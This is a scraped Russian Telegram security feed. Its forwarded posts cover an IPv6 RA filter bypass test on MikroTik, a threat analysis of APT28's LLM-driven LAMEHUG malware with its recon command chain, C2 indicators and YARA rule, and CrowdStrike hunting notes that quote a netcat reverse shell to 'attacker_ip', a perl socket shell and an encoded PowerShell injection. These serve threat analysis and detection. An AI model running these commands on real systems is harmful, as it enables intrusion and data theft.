Forwarded from Caster
Hop-by-Hop Headers (HBH) действительно могут использоваться для обхода фильтрации RA-пакетов.
В своей лабораторной сети я использовал маршрутизатор MikroTik с RouterOS
В первой попытке, в
На такие rogue RA-пакеты FW перестал реагировать, и атакующему удалось провести инъекцию RA-пакета. Судя по всему, RouterOS не анализирует всю цепочку IPv6-заголовков и не доходит до ICMPv6, если он инкапсулирован после HBH.
В своей лабораторной сети я использовал маршрутизатор MikroTik с RouterOS
v7.15.3В первой попытке, в
14:09:19, я отправил 16 ICMPv6 RA-пакетов для проведения MITM-атаки, и FW на это среагировал. Во второй попытке, в 14:13:39, я поместил в пакет HBH-заголовок с полезной нагрузкой, состоящей из простых слов на английском.На такие rogue RA-пакеты FW перестал реагировать, и атакующему удалось провести инъекцию RA-пакета. Судя по всему, RouterOS не анализирует всю цепочку IPv6-заголовков и не доходит до ICMPv6, если он инкапсулирован после HBH.
www.opennet.ru
В Clang намерены добавить режим усиленной безопасности
Аарон Баллман (Aaron Ballman), главный сопровождающий компилятор Clang и участник команд разработки стандартов WG21 (C++) и WG14 (C), начал обсуждение добавления в компилятор Clang режима усиления безопасности. Новый режим позволит разом активировать набор…
🔗Ссылка:
https://opennet.ru/63675/
https://opennet.ru/63675/
www.opennet.ru
На соревновании Pwn2Own готовы выплатить миллион долларов за уязвимость в WhatsApp
Проект Zero Day Initiative (ZDI), предоставляющий денежные вознаграждения за сообщения о неисправленных уязвимостях, анонсировал проведение соревнований Pwn2Own Ireland 2025, которые состоятся в середине октября в Ирландии. Участникам предложено продемонстрировать…
🔗Ссылка:
https://opennet.ru/63673/
https://opennet.ru/63673/
Forwarded from Похек
[1/2] APT28 LAMEHUG: Первый AI-Powered Malware в дикой природе
Российская группировка APT28 (Forest Blizzard, UAC-0001) представила новую эру кибератак, разработав первый публично документированный malware с интегрированной большой языковой моделью. LAMEHUG открывает новую главу в истории вредоносного ПО.
Техническая архитектура
Основные компоненты:
- Язык разработки: Python
- Упаковка: PyInstaller (.pif файлы)
- LLM: Qwen 2.5-Coder-32B-Instruct
- API: Hugging Face Inference API
- Доставка: Фишинговые email с ZIP-архивами
Революционный подход:
LAMEHUG принимает текстовые инструкции на естественном языке и через LLM преобразует их в системные команды, которые выполняются на зараженной машине. Это позволяет автоматизировать сложные задачи разведки и кражи данных без предварительного программирования конкретных команд.
Механизм работы
Этап 1: Инфицирование
Этап 2: AI-генерация команд
Malware отправляет промпты к Qwen 2.5-Coder через Hugging Face API:
Этап 3: Выполнение сгенерированных команд
LLM возвращает готовые команды, которые LAMEHUG выполняет через cmd.exe:
Этап 4: Сбор и эксфильтрация данных
- Рекурсивный поиск в Documents, Desktop, Downloads
- Стейджинг файлов для эксфильтрации
- Передача данных через SFTP или HTTP POST
Варианты malware
Обнаружены три версии:
1. Основная версия (Appendix.pdf.pif)
- Базовая функциональность AI-генерации команд
- Сбор системной информации
- Эксфильтрация через SFTP
2. AI_generator_uncensored_Canvas_PRO_v0.9.exe
- Расширенные возможности генерации
- Альтернативные методы эксфильтрации
- Обход цензуры LLM
3. image.py
- Python-скрипт версия
- Модифицированная логика эксфильтрации
- Возможно, тестовая версия
Технические индикаторы
Файловые артефакты:
Сетевые индикаторы:
Хеши файлов:
Методы обнаружения
1. Мониторинг файловой активности:
2. Обнаружение разведки:
3. Сетевой мониторинг:
Российская группировка APT28 (Forest Blizzard, UAC-0001) представила новую эру кибератак, разработав первый публично документированный malware с интегрированной большой языковой моделью. LAMEHUG открывает новую главу в истории вредоносного ПО.
Техническая архитектура
Основные компоненты:
- Язык разработки: Python
- Упаковка: PyInstaller (.pif файлы)
- LLM: Qwen 2.5-Coder-32B-Instruct
- API: Hugging Face Inference API
- Доставка: Фишинговые email с ZIP-архивами
Революционный подход:
LAMEHUG принимает текстовые инструкции на естественном языке и через LLM преобразует их в системные команды, которые выполняются на зараженной машине. Это позволяет автоматизировать сложные задачи разведки и кражи данных без предварительного программирования конкретных команд.
Механизм работы
Этап 1: Инфицирование
Appendix.pdf.zip → Appendix.pdf.pif → PyInstaller executable
Этап 2: AI-генерация команд
Malware отправляет промпты к Qwen 2.5-Coder через Hugging Face API:
"Generate Windows commands to collect system information including hardware, processes, services, and network configuration"
Этап 3: Выполнение сгенерированных команд
LLM возвращает готовые команды, которые LAMEHUG выполняет через cmd.exe:
cmd.exe /c "mkdir %PROGRAMDATA%\info &&
systeminfo >> %PROGRAMDATA%\info\info.txt &&
wmic computersystem get name,manufacturer,model >> %PROGRAMDATA%\info\info.txt &&
wmic cpu get name,speed >> %PROGRAMDATA%\info\info.txt &&
wmic memorychip get capacity,speed >> %PROGRAMDATA%\info\info.txt &&
wmic diskdrive get model,size >> %PROGRAMDATA%\info\info.txt &&
wmic nic get name,macaddress,ipaddress >> %PROGRAMDATA%\info\info.txt &&
tasklist >> %PROGRAMDATA%\info\info.txt &&
net start >> %PROGRAMDATA%\info\info.txt &&
ipconfig /all >> %PROGRAMDATA%\info\info.txt &&
whoami /user >> %PROGRAMDATA%\info\info.txt &&
whoami /groups >> %PROGRAMDATA%\info\info.txt &&
net config workstation >> %PROGRAMDATA%\info\info.txt &&
dsquery user -samid %username% >> %PROGRAMDATA%\info\info.txt"
Этап 4: Сбор и эксфильтрация данных
- Рекурсивный поиск в Documents, Desktop, Downloads
- Стейджинг файлов для эксфильтрации
- Передача данных через SFTP или HTTP POST
Варианты malware
Обнаружены три версии:
1. Основная версия (Appendix.pdf.pif)
- Базовая функциональность AI-генерации команд
- Сбор системной информации
- Эксфильтрация через SFTP
2. AI_generator_uncensored_Canvas_PRO_v0.9.exe
- Расширенные возможности генерации
- Альтернативные методы эксфильтрации
- Обход цензуры LLM
3. image.py
- Python-скрипт версия
- Модифицированная логика эксфильтрации
- Возможно, тестовая версия
Технические индикаторы
Файловые артефакты:
%PROGRAMDATA%\info\info.txt - системная информация
Appendix.pdf.pif - основной payload
AI_generator_uncensored_Canvas_PRO_v0.9.exe - альтернативная версия
Сетевые индикаторы:
C2 серверы: 144.126.202.227, 192.36.27.37
Домены: boroda70@meta.ua, stayathomeclasses.com
API: inference.huggingface.co (Qwen 2.5-Coder)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Хеши файлов:
8013b23cb78407675f323d54b6b8dfb2a61fb40fb13309337f5b662dbd812a5d
766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777
a30930dfb655aa39c571c163ada65ba4dec30600df3bf548cc48bedd0e841416
d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e
bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3
384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715
Методы обнаружения
1. Мониторинг файловой активности:
Sysmon Event ID 11: File creation in %PROGRAMDATA%\info\*
Suspicious files in writable directories: AppData, ProgramData, Users\Public
2. Обнаружение разведки:
Множественные команды reconnaissance в короткий период:
whoami, systeminfo, wmic, ipconfig, net, tasklist
3. Сетевой мониторинг:
Подключения к LLM API endpoints:
- inference.huggingface.co
- api.openai.com
- generativelanguage.googleapis.com
- api.anthropic.com
Forwarded from Похек
[2/2] APT28 LAMEHUG: Первый AI-Powered Malware в дикой природе
4. Поведенческий анализ:
Защитные меры
Немедленные действия:
1. Блокировка известных IoC (IP, домены, хеши)
2. Мониторинг обращений к LLM API
3. Усиленный контроль email-вложений
4. Проверка директории %PROGRAMDATA%\info\
Долгосрочные меры:
Правила YARA для обнаружения:
Значение для индустрии
Новая эра угроз:
LAMEHUG представляет фундаментальный сдвиг в разработке malware. Использование LLM для динамической генерации команд делает malware более адаптивным и сложным для обнаружения.
Ключевые риски:
- Автоматизация сложных атак без экспертизы
- Обход статических сигнатур через динамическую генерацию
- Снижение барьера входа для киберпреступников
- Масштабирование персонализированных атак
Эволюция защиты:
Традиционные методы обнаружения, основанные на статических сигнатурах, становятся менее эффективными. Необходим переход к поведенческому анализу и мониторингу AI-активности.
Прогнозы развития
Ближайшее будущее:
- Интеграция более мощных LLM (GPT-4, Claude)
- Локальные LLM для избежания сетевых индикаторов
- AI-генерация полиморфного кода
- Автоматизированная социальная инженерия
Защитные технологии:
- AI-powered detection systems
- Behavioral analysis of AI usage
- LLM API monitoring and filtering
- Adversarial AI techniques
Практические рекомендации
Для SOC-команд:
1. Внедрить мониторинг LLM API трафика
2. Усилить анализ email-вложений с PyInstaller
3. Разработать playbook для AI-powered threats
Для организаций:
1. Обучение персонала новым типам угроз
2. Обновление политик использования AI
3. Контроль доступа к LLM API
4. Регулярный аудит AI-активности в сети
Выводы
LAMEHUG знаменует начало новой эры в кибербезопасности. APT28 продемонстрировала, как AI может быть weaponized для создания более изощренных и адаптивных угроз.
Критические моменты:
- Первый случай боевого применения LLM в malware
- Динамическая генерация команд через AI
- Снижение технических барьеров для атакующих
- Необходимость пересмотра подходов к защите
Индустрия должна готовиться к волне AI-powered угроз. Время адаптации защитных стратегий - сейчас.
✍️ Источник
🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK
4. Поведенческий анализ:
Необычные паттерны выполнения команд
Автоматизированная генерация системных команд
Массовый сбор системной информации
Защитные меры
Немедленные действия:
1. Блокировка известных IoC (IP, домены, хеши)
2. Мониторинг обращений к LLM API
3. Усиленный контроль email-вложений
4. Проверка директории %PROGRAMDATA%\info\
Долгосрочные меры:
# Блокировка LLM API (если не используются легитимно)
netsh advfirewall firewall add rule name="Block_LLM_APIs"
dir=out action=block remoteip=inference.huggingface.co
# Мониторинг подозрительных процессов
wevtutil qe Security /q:"*[System[EventID=4688] and
EventData[Data[@Name='NewProcessName'] and
(contains(.,'wmic') or contains(.,'systeminfo'))]]"
Правила YARA для обнаружения:
rule LAMEHUG_AI_Malware {
meta:
description = "Detects LAMEHUG AI-powered malware"
author = "Security Research"
date = "2025-07-30"
strings:
$api1 = "inference.huggingface.co"
$api2 = "Qwen2.5-Coder"
$path = "%PROGRAMDATA%\\info\\info.txt"
$cmd1 = "systeminfo >>"
$cmd2 = "wmic computersystem"
condition:
2 of them
}Значение для индустрии
Новая эра угроз:
LAMEHUG представляет фундаментальный сдвиг в разработке malware. Использование LLM для динамической генерации команд делает malware более адаптивным и сложным для обнаружения.
Ключевые риски:
- Автоматизация сложных атак без экспертизы
- Обход статических сигнатур через динамическую генерацию
- Снижение барьера входа для киберпреступников
- Масштабирование персонализированных атак
Эволюция защиты:
Традиционные методы обнаружения, основанные на статических сигнатурах, становятся менее эффективными. Необходим переход к поведенческому анализу и мониторингу AI-активности.
Прогнозы развития
Ближайшее будущее:
- Интеграция более мощных LLM (GPT-4, Claude)
- Локальные LLM для избежания сетевых индикаторов
- AI-генерация полиморфного кода
- Автоматизированная социальная инженерия
Защитные технологии:
- AI-powered detection systems
- Behavioral analysis of AI usage
- LLM API monitoring and filtering
- Adversarial AI techniques
Практические рекомендации
Для SOC-команд:
1. Внедрить мониторинг LLM API трафика
2. Усилить анализ email-вложений с PyInstaller
3. Разработать playbook для AI-powered threats
Для организаций:
1. Обучение персонала новым типам угроз
2. Обновление политик использования AI
3. Контроль доступа к LLM API
4. Регулярный аудит AI-активности в сети
Выводы
LAMEHUG знаменует начало новой эры в кибербезопасности. APT28 продемонстрировала, как AI может быть weaponized для создания более изощренных и адаптивных угроз.
Критические моменты:
- Первый случай боевого применения LLM в malware
- Динамическая генерация команд через AI
- Снижение технических барьеров для атакующих
- Необходимость пересмотра подходов к защите
Индустрия должна готовиться к волне AI-powered угроз. Время адаптации защитных стратегий - сейчас.
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Пакет StarDict в Debian отправляет выделенный текст на внешние серверы
В предлагаемом в репозитории Debian Testing (будущий релиз Debian 13) пакете StarDict, реализующем интерфейс для поиска в словарях, выявлена проблема с конфиденциальностью - в конфигурации по умолчанию приложение отправляет автоматически помещаемый в буфер…
🔗Ссылка:
https://opennet.ru/63677/
https://opennet.ru/63677/
www.opennet.ru
Выпуск Proxmox VE 9.0, дистрибутива для организации работы виртуальных серверов
Опубликован релиз Proxmox Virtual Environment 9.0, специализированного Linux-дистрибутива на базе Debian GNU/Linux, нацеленного на развертывание и обслуживание виртуальных серверов с использованием LXC и KVM, и способного выступить в роли замены таких продуктов…
🔗Ссылка:
https://opennet.ru/63688/
https://opennet.ru/63688/
Forwarded from Threat Hunting Father 🦔
Crowdstrike_Threat_Hunting_Report.pdf
9.3 MB
Что подметить из репорта:
🔀 Cross-Domain / Cloud: когда атакуют сразу всё
🕷️ BLOCKADE SPIDER:
• Начал с уязвимого VPN → DCSync → lateral через WinRM / PsExec
• Переходил с endpoint на cloud: bypass MFA, создание rogue IAM agent
• Пробивал Entra ID: добавление в “IAM No MFA”, обход геофильтров
• На unmanaged системах ставил Chisel proxy и устраивал SOCKS-туннели
📌 Зафиксированы попытки помешать Falcon Sensor
• Эксплуатация Cisco IOS/IOS XE (CVE-2023-20198 + CVE-2023-20273)
• Создание локального пользователя → log sanitization → RCE
• Удар по blind-spot: роутеры, VPN, свитчи, вне зоны действия EDR
• Pivot из Jenkins в облако через IMDS → добавление SSH-ключей и access key
• Использование CSP CLI и команд:
curl http://IP/latest/meta-data/
aws s3 ls
gcloud compute ssh ...
• Жил в control plane, хостил payload на облачных инстансах• Использовал .NET тул для возвращения в консоль по backdoor key
• Атака через trusted relationship → backdoor в Entra ID сервисные учётки
• Компрометация стороннего Azure-провайдера → логины с NAS/VPS
• Отмечена малварь CloudedHope, удаление логов и резкая OPSEC-дисциплина
• MFA reset → SSO логин → SharePoint → PAM → dump ntds.dit
• Отслежено, как они:
меняют IP на резидентские (NSOCKS)
ищут "reset password" шаблоны
работают ночью, чтобы не быть замеченными
SaaS + Identity + Endpoint = полный доступ без вирусов.
🔍 Поиск по:
DeviceLogonEvents
| where AccountName endswith "@domain.com"
| where Timestamp during non-business-hours
| where LogonType == "RemoteInteractive"
• Угроза телеком-сектора на Linux, скрытая и долгая
• Эксплуатация CVE-2016-5195 (Dirty COW) + CVE-2021-4034 (PwnKit)
• ShieldSlide: троянизированный OpenSSH (
/usr/sbin/sshd) с логами auth + backdoor-пароль• Примеры артефактов:
/usr/sbin/cron → изменённый daemonperl -e 'use Socket; ...' → reverse shellnetcat -e /bin/bash attacker_ip• LOTL-движение, атаки между дочками компаний
sha256sum /usr/sbin/sshd | grep -v known_good
ps aux | grep cron | grep -v /usr/sbin/cron
• Zero-Day в Cleo MFT (
CVE-2024-55956) → bypass старого фикса CVE-2024-50623• Этапы:
Загрузка
.zip → C:\VLTrader\temp\В распаковке XML с параметром выполнения команды
Внедрение shellcode → запуск пиратского Cobalt Strike
• Использовал:
<Mailbox type="system" command="powershell -enc ..." />
Falcon Sensor + OverWatch охота по:#event_simpleName=PeFileWritten
ContextBaseFileName=java.exe
TargetFileName!=/<known_good_files>/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Social Engineering
• Недавно в блоге Operation Zero (компания которая покупает уязвимости в различном ПО\устройствах) была опубликована хорошая статья, которая описывает архитектуру современных браузеров и их эксплуатации на примере Chrome.
• Вы сможете изучить, как устроены подсистемы браузера, как обеспечивается их безопасность и как она нарушается с помощью уязвимостей, примитивов, обходов защит, эксплоитов и их цепочек. Каждая статья будет практической, поэтому с самого начала авторы кратко анализируют несколько известных эксплоитов, компилируют их благодаря публичному репозиторию и пробивают Chrome 130-й версии для Windows.
• Учитывайте, что на данный момент опубликована только первая часть на английском языке. Позже будет опубликовано продолжение, так что следите за блогом. Ну и еще обещают перевод на русский язык, но это не точно.
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM